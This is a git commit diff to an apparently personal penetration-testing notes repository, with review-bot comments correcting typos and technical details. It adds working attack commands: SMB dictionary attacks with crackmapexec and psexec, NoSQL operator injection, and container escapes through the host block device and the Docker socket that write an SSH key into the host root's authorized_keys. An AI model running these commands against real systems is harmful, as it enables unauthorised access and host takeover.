This commit is contained in:
Stefan Friese 2021-11-04 17:19:58 +01:00
parent 6b8f9472c7
commit 7b33c61fec
8 changed files with 117 additions and 1 deletions

3
.gitmodules vendored
View File

@ -52,3 +52,6 @@
[submodule "exploit/windows/CVE-2021-1675"]
path = exploit/windows/CVE-2021-1675
url = https://github.com/calebstewart/CVE-2021-1675
[submodule "enumeration/priv_esc/deepce"]
path = enumeration/priv_esc/deepce
url = https://github.com/stealthcopter/deepce.git
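Review bot: the new entry's URL ends in `.git` while the neighbouring CVE-2021-1675 entry's does not; git accepts both, but one spelling across .gitmodules avoids needless churn the next time an entry is edited, so consider dropping the suffix or adding it to the other entries in a follow-up.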

10
crackmapexec.md Normal file
View File

@ -0,0 +1,10 @@
# Crackmapexec
* Dictionary attack against SMB
```sh
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
```
* Use the password with `impacket/examples/psexec.py` in the following way
```sh
psexec.py domain.name/<user>:<password>@<target-IP>
```
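Review bot: there is a stray `s` in the cme invocation between `-u <user>` and `-p`, which cme will treat as an extra positional argument and refuse; the line should read `cme smb domain.name -u <user> -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt`. The second bullet could also say that it is the `<user>:<password>` pair reported as valid by the first step that goes into the psexec.py line, since "the password" on its own is ambiguous.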

@ -1 +0,0 @@
Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d

@ -0,0 +1 @@
Subproject commit 229fad09eee712ede052525d4d3df29410bc0199
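Review bot: neither subproject-commit hunk shows its path on this page, and the single deletion in this commit is the removed pointer `3c0e726604c9dc2590a699c89aabeaa0acf9f94d` while .gitmodules only gains the `enumeration/priv_esc/deepce` entry and loses none; that pattern looks like a submodule being moved to the new path rather than added from scratch. If that is the case, a line in the commit message saying where it came from, and a check that no entry for the old path is left behind, would make the history easier to follow.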

15
exploit/sqli/no_sqli.md Normal file
View File

@ -0,0 +1,15 @@
# NoSQL Injections
* No tables, but files (collections)
* Examples are Elasticsearch, MongoDB, Redis, CouchDB.
## Querying
* Filter instead of SQL queries
* [Redis docs](https://redis.io/documentation)
* [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)
* [Elasticsearch docs](https://www.elastic.co/guide/index.html)
## Tips & Tricks
* Pass HTTP parameter as an array instead of `user=` and `password=` use `user[$operator]=foo` and `password[$operator]=bar`
* 2D array via `user[$nin][]=foo`
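Review bot: "No tables, but files (collections)" is inaccurate and only fits MongoDB: MongoDB groups documents into collections, Redis is a key-value store and Elasticsearch holds documents in indices, so something like "no tables; documents or keys instead (MongoDB calls the grouping a collection)" would be more precise. The `user[$operator]=foo` bullet also deserves one sentence on why it works: frameworks whose query or body parser expands bracket syntax into nested objects let a parameter the application expects to be a string arrive as an object carrying a query operator. Stating that mechanism also gives the reader the fix, namely coercing expected scalars to strings and rejecting keys that start with `$` before the value reaches the query.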

View File

@ -96,6 +96,35 @@ echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
## Check fdisk
* `fdisk -l` and `lsblk`, host bulk device may be exposed
* Mount the device
```sh
mkdir /mnt/hostdev
mount /dev/<hostVda> /mnt/hostdev
```
## Creating a Container from inside another container
* Needs root inside a container
* Upload [static curl](https://github.com/moparisthebest/static-curl)
* Check available images and containers
```sh
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/containers/json
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/images/json
```
* Inside the container as root
```sh
curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"<imagename>:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo <ssh-key> >> /var/tmp/root/.ssh/authorized_keys"]}'
```
* Return value is the ID
* Start a container
```sh
curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
```
* Login in to the host via ssh
## Dirty c0w
https://github.com/dirtycow/dirtycow.github.io
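Review bot: the container-create command in the "Inside the container as root" block calls plain `curl` against `/var/run/docker.sock`, while the list and start commands use the uploaded `curl-amd64` and `/run/docker.sock`; since the section says curl has to be uploaded, plain `curl` is probably not present in the container and the line should use `curl-amd64` (the two socket paths usually resolve to the same file, but one spelling throughout reads better). Minor wording: "host bulk device" in the fdisk section should be "host block device", and "Login in to the host" should be "Log in to the host". The Dirty c0w section is only a bare link; a short line noting that it needs a kernel without the October 2016 fix, unlike the cgroup, block-device and docker.sock sections above which depend on container configuration rather than kernel age, would save the reader a dead end.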

View File

@ -9,3 +9,27 @@
```sh
./fat.py <firmware>
```
* [Jefferson](https://github.com/sviehb/jefferson) or AUR package `jefferson-git`
## Usage
* Check image via `strings`
* Check CRC via `cksum -a crc <image>`
* Use `binwalk` to extract. There are to methods
* `-e` extract by offset
* `--dd=".*"` by file extension
### Mount JFFS2 File
* Use kernel where `CONFIG_MTD_RAM` is set. Using Arch this is any kernel before `5.10`
```sh
rm -rf /dev/mtdblock0
mknod /dev/mtdblock0 b 31 0
mkdir /mnt/jffs2
modprobe jffs2
modprobe mtdram
modprobe mtdblock
dd if=<jffs2File> of=/dev/mtdblock0
mount -t jffs2 /dev/mtdblock0 /mnt/jffs2/
```
## Tips & Tricks
* Watch out for `HNAP` and `JNAP` as [an attack vector](https://routersecurity.org/hnap.php)
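Review bot: "There are to methods" should be "two methods", and the description of `--dd=".*"` as "by file extension" is wrong: the argument to `-D/--dd` is a regular expression matched against the signature type (optionally followed by `:ext:cmd`), so `--dd=".*"` means "carve every signature match to a file", whereas `-e` only extracts the types binwalk has an extractor for; "by offset" for `-e` is therefore also misleading. In the JFFS2 block, `mtdram` defaults to a 4 MiB device, so the `dd` step silently truncates larger images; loading it as `modprobe mtdram total_size=<KiB>` sized to the image avoids that. `rm -rf` on a device node is heavier than needed, `rm -f /dev/mtdblock0` does the same job.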

View File

@ -0,0 +1,35 @@
# Supervisory Control and Data Acquisition (SCADA)
* SCADA works as an aggregatio of the following systems
* __Programmable Logic Controllers (PLC)__, monitoring sensors and controlling devices.
* __Remote Terminal Unit (RTU)__, use for wide area telemetry
* __Human Machine Interface (HMI)__, supervisory through an operator. Interaction through human user input.
* __Communication network__
* Security is no first class citizen
## Modbus
* Developed by Modicon
* Master/Slave, latter has an 8 bit address.
* RS-485 Connector
* Data registers 16 bit
* Input register, 16 bit ro
* Hold register, rw
* Coil register, 1 bit rw
* Discrete register, 1bit ro
### Function Codes
* [Modbus101](https://www.csimn.com/CSI_pages/Modbus101.html)
* RTU request inside of TCP segments, port 502
* 1 __Read Coil__
* 2 __Read Discrete Input__
* 3 __Read Holding Registers__
* 4 __Read Input Registers__
* 5 __Write Single Coil__
* 6 __Write Single Holding Register__
* 15 __Write Multiple Coils__
* 16 __Write Multiple Holding Registers__
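Review bot: several typos and one technical slip in the new file. "aggregatio" should be "aggregation", "use for wide area telemetry" should be "used for", "1bit" should be "1 bit", and "Security is no first class citizen" reads better as "Security is not a first-class citizen". In the register list the standard Modbus names are coils (1 bit, rw), discrete inputs (1 bit, ro), input registers (16 bit, ro) and holding registers (16 bit, rw), so "Hold register" and "Discrete register" should be "Holding register" and "Discrete input"; that also lines up with function codes 1 to 4 below. "RTU request inside of TCP segments" describes "Modbus RTU over TCP", which is a different framing: Modbus TCP on port 502 prefixes the PDU with an MBAP header (transaction id, protocol id, length, unit id) and drops the RTU CRC, since TCP already provides integrity checking. Given the "Security is no first class citizen" bullet, it would be worth stating explicitly that none of these function codes carry authentication, so the write codes 5, 6, 15 and 16 are honoured from any host that can reach port 502, which is the reason to segment that port and alert on write requests from unexpected sources.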